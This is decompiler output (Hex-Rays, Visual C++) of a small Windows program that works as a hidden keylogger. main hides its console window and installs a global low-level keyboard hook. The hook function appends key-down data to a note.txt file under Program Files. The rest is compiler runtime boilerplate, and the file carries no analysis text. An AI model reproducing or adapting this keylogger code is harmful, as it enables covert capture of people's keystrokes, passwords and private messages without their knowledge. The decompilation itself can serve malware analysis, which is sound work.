/* This file was generated by the Hex-Rays decompiler version 9.4.0.260610.
   Copyright (c) 2007-2025 Hex-Rays <info@hex-rays.com>

   Detected compiler: Visual C++
*/

#include <windows.h>
#include <defs.h>


//-------------------------------------------------------------------------
// Function declarations

LRESULT __stdcall fn(int code, WPARAM wParam, char *lParam);
int __cdecl main(int argc, const char **argv, const char **envp);
int sub_4011B3();
int sub_4011BB();
int __cdecl UserMathErrorFunction();
int sub_401768();
void sub_401772();
char sub_40177E();
void *sub_4017A5();
void *sub_4017AB();
// int __scrt_initialize_default_local_stdio_options(void); weak
BOOL sub_4017CE();
void *sub_4017DA();
void *sub_4017E0();
LPTOP_LEVEL_EXCEPTION_FILTER sub_401942();
// LONG __stdcall __scrt_unhandled_exception_filter(struct _EXCEPTION_POINTERS *ExceptionInfo); idb
void sub_4019A4();
void sub_4019AC();
void __cdecl sub_4019D8(); // idb
int sub_401A84();
// int __cdecl set_new_mode(int NewMode);

//-------------------------------------------------------------------------
// Data declarations

// extern BOOL (__stdcall *AllocConsole)();
// extern void (__stdcall *InitializeSListHead)(PSLIST_HEADER ListHead);
// extern BOOL (__stdcall *IsProcessorFeaturePresent)(DWORD ProcessorFeature);
// extern LPTOP_LEVEL_EXCEPTION_FILTER (__stdcall *SetUnhandledExceptionFilter)(LPTOP_LEVEL_EXCEPTION_FILTER lpTopLevelExceptionFilter);
// extern BOOL (__stdcall *ShowWindow)(HWND hWnd, int nCmdShow);
// extern LRESULT (__stdcall *DispatchMessageW)(const MSG *lpMsg);
// extern HWND (__stdcall *FindWindowA)(LPCSTR lpClassName, LPCSTR lpWindowName);
// extern HHOOK (__stdcall *SetWindowsHookExW)(int idHook, HOOKPROC lpfn, HINSTANCE hmod, DWORD dwThreadId);
// extern BOOL (__stdcall *TranslateMessage)(const MSG *lpMsg);
// extern LRESULT (__stdcall *CallNextHookEx)(HHOOK hhk, int nCode, WPARAM wParam, LPARAM lParam);
// extern BOOL (__stdcall *GetMessageW)(LPMSG lpMsg, HWND hWnd, UINT wMsgFilterMin, UINT wMsgFilterMax);
// extern int (__cdecl *fputs)(const char *Buffer, FILE *Stream);
// extern int (__cdecl *puts)(const char *Buffer);
// extern int (__cdecl *fclose)(FILE *Stream);
// extern FILE *(__cdecl *fopen)(const char *FileName, const char *Mode);
int dword_403048 = 1; // weak
int dword_403050 = -1; // weak
int dword_403054 = -1; // weak
int dword_403058 = 1; // weak
union _SLIST_HEADER ListHead; // idb
_UNKNOWN unk_4033A8; // weak
_UNKNOWN unk_4033B0; // weak
int dword_4033B8; // weak
int dword_4033BC; // weak
int dword_4033C0; // weak
int dword_4033C4; // weak
_UNKNOWN unk_4033C8; // weak
_UNKNOWN unk_4033CC; // weak
FILE *Stream; // idb
LPMSG lpMsg; // idb
HHOOK hhk; // idb


//----- (00401000) --------------------------------------------------------
LRESULT __stdcall fn(int code, WPARAM wParam, char *lParam)
{
  FILE *v3; // eax

  v3 = fopen("C:\\Program Files (x86)\\note.txt", "a+");
  Stream = v3;
  if ( wParam == 256 )
  {
    fputs(lParam, v3);
    fclose(Stream);
  }
  return CallNextHookEx(hhk, code, wParam, (LPARAM)lParam);
}

//----- (00401060) --------------------------------------------------------
int __cdecl main(int argc, const char **argv, const char **envp)
{
  HWND WindowA; // eax

  AllocConsole();
  WindowA = FindWindowA("ConsoleWindowClass", nullptr);
  ShowWindow(WindowA, 0);
  hhk = SetWindowsHookExW(13, (HOOKPROC)fn, nullptr, 0);
  if ( hhk != nullptr )
    puts("All is good");
  else
    puts("Something went wrong :(");
  while ( GetMessageW(lpMsg, nullptr, 0, 0) > 0 )
  {
    TranslateMessage(lpMsg);
    DispatchMessageW(lpMsg);
  }
  return 0;
}

//----- (004011B3) --------------------------------------------------------
int sub_4011B3()
{
  __scrt_initialize_default_local_stdio_options();
  return 0;
}
// 4017B1: using guessed type int __scrt_initialize_default_local_stdio_options(void);

//----- (004011BB) --------------------------------------------------------
int sub_4011BB()
{
  int v0; // eax

  sub_401942();
  v0 = UserMathErrorFunction();
  return set_new_mode(v0);
}

//----- (00401765) --------------------------------------------------------
int __cdecl UserMathErrorFunction()
{
  return 0;
}

//----- (00401768) --------------------------------------------------------
int sub_401768()
{
  return 1;
}

//----- (00401772) --------------------------------------------------------
void sub_401772()
{
  InitializeSListHead(&ListHead);
}

//----- (0040177E) --------------------------------------------------------
char sub_40177E()
{
  return 1;
}

//----- (004017A5) --------------------------------------------------------
void *sub_4017A5()
{
  return &unk_4033A8;
}

//----- (004017AB) --------------------------------------------------------
void *sub_4017AB()
{
  return &unk_4033B0;
}

//----- (004017CE) --------------------------------------------------------
BOOL sub_4017CE()
{
  return dword_403048 == 0;
}
// 403048: using guessed type int dword_403048;

//----- (004017DA) --------------------------------------------------------
void *sub_4017DA()
{
  return &unk_4033CC;
}

//----- (004017E0) --------------------------------------------------------
void *sub_4017E0()
{
  return &unk_4033C8;
}

//----- (00401942) --------------------------------------------------------
LPTOP_LEVEL_EXCEPTION_FILTER sub_401942()
{
  return SetUnhandledExceptionFilter(__scrt_unhandled_exception_filter);
}

//----- (004019A4) --------------------------------------------------------
void sub_4019A4()
{
  dword_4033B8 = 0;
}
// 4033B8: using guessed type int dword_4033B8;

//----- (004019AC) --------------------------------------------------------
void sub_4019AC()
{
  ;
}
// 4019AC: could not find valid save-restore pair for edi

//----- (004019D8) --------------------------------------------------------
void __cdecl sub_4019D8()
{
  ;
}
// 4019D8: could not find valid save-restore pair for edi

//----- (00401A84) --------------------------------------------------------
int sub_401A84()
{
  int v5; // edi
  int v11; // eax
  int v12; // edx
  unsigned int v14; // edi
  unsigned int v29; // esi
  int v30; // eax
  unsigned int v31; // ecx
  int v32; // eax
  int v33; // eax
  int v34; // ecx
  unsigned int v35; // eax
  int v36; // edi
  int v38; // [esp+0h] [ebp-28h]
  int v39; // [esp+10h] [ebp-18h]
  int v40; // [esp+10h] [ebp-18h]
  int v41; // [esp+14h] [ebp-14h]
  int v42; // [esp+14h] [ebp-14h]
  char v43; // [esp+18h] [ebp-10h]
  int v44; // [esp+1Ch] [ebp-Ch]
  int v45; // [esp+20h] [ebp-8h]
  int v46; // [esp+24h] [ebp-4h]

  dword_4033C0 = 0;
  dword_403058 |= 1u;
  if ( IsProcessorFeaturePresent(0xAu) )
  {
    _EAX = 0;
    __asm { cpuid }
    v46 = _EAX;
    v5 = _EBX ^ 0x756E6547;
    v39 = _EDX ^ 0x49656E69;
    v41 = _ECX ^ 0x6C65746E;
    _EAX = 1;
    __asm { cpuid }
    v38 = _EAX;
    if ( (v5 | v41 | v39) == 0 )
    {
      v11 = _EAX & 0xFFF3FF0;
      if ( (v38 & 0xFFF3FF0) == 0x106C0
        || v11 == 132704
        || v11 == 132720
        || v11 == 198224
        || v11 == 198240
        || v11 == 198256 )
      {
        dword_4033C4 |= 1u;
      }
    }
    v12 = _ECX;
    _EBX = 0;
    v42 = 0;
    v14 = 0;
    v40 = 0;
    v44 = _ECX;
    if ( v46 >= 7 )
    {
      _EAX = 7;
      __asm { cpuid }
      v45 = _EBX;
      v42 = _EDX;
      if ( (_EBX & 0x200) != 0 )
        dword_4033C4 |= 2u;
      if ( _EAX >= 1 )
      {
        _EAX = 7;
        __asm { cpuid }
        _EBX = v45;
        v40 = _EDX;
      }
      _EAX = 36;
      if ( v46 >= 36 )
      {
        __asm { cpuid }
        v29 = _EBX;
        _EBX = v45;
        v14 = v29;
      }
      v12 = v44;
    }
    v30 = dword_403058 | 2;
    v31 = dword_403050 & 0xFFFFFFFE;
    dword_4033C0 = 1;
    dword_403058 |= 2u;
    dword_403050 &= ~1u;
    if ( (v12 & 0x100000) != 0 )
    {
      v32 = v30 | 4;
      dword_4033C0 = 2;
      dword_403058 = v32;
      dword_403050 = v31 & 0xFFFFFFEF;
      if ( (v12 & 0x8000000) != 0 && (v12 & 0x10000000) != 0 )
      {
        __asm { xgetbv }
        v43 = v32;
        if ( (v32 & 6) == 6 )
        {
          v33 = dword_403058 | 8;
          dword_4033C0 = 3;
          dword_403058 |= 8u;
          if ( (_EBX & 0x20) != 0 )
          {
            v34 = dword_403054;
            dword_403058 = v33 | 0x20;
            v35 = dword_403050 & 0xFFFFFFFD;
            dword_4033C0 = 5;
            dword_403050 &= ~2u;
            if ( (_EBX & 0xD0030000) != 0xD0030000 )
            {
LABEL_27:
              if ( (v42 & 0x800000) != 0 )
              {
                dword_403054 = v34;
                dword_403050 = v35 & 0xFEFFFFFF;
              }
              if ( (v40 & 0x80000) != 0 && (v43 & 0xE0) == 0xE0 )
              {
                dword_4033BC = v14 & 0x400FF;
                v36 = dword_403050 & ~(HIWORD(v14) & 7 | 0x1000028);
                dword_403050 = v36;
                if ( (unsigned int)dword_4033BC > 1 )
                  dword_403050 = v36 & 0xFFFFFFBF;
              }
              return 0;
            }
            if ( (v43 & 0xE0) == 0xE0 )
            {
              dword_403058 |= 0x40u;
              v35 = dword_403050 & 0xFFFFFFDB;
              v34 = dword_403054;
              dword_4033C0 = 6;
              dword_403050 &= 0xFFFFFFDB;
              goto LABEL_27;
            }
          }
          v34 = dword_403054;
          v35 = dword_403050;
          goto LABEL_27;
        }
      }
    }
  }
  return 0;
}
// 401A84: could not find valid save-restore pair for ebx
// 401CEE: conditional instruction was optimized away because ecx.4==0
// 401D5E: conditional instruction was optimized away because ecx.4==0
// 403050: using guessed type int dword_403050;
// 403054: using guessed type int dword_403054;
// 403058: using guessed type int dword_403058;
// 4033BC: using guessed type int dword_4033BC;
// 4033C0: using guessed type int dword_4033C0;
// 4033C4: using guessed type int dword_4033C4;

// nfuncs=75 queued=18 decompiled=18 lumina nreq=0 worse=0 better=0
// ALL OK, 18 function(s) have been successfully decompiled
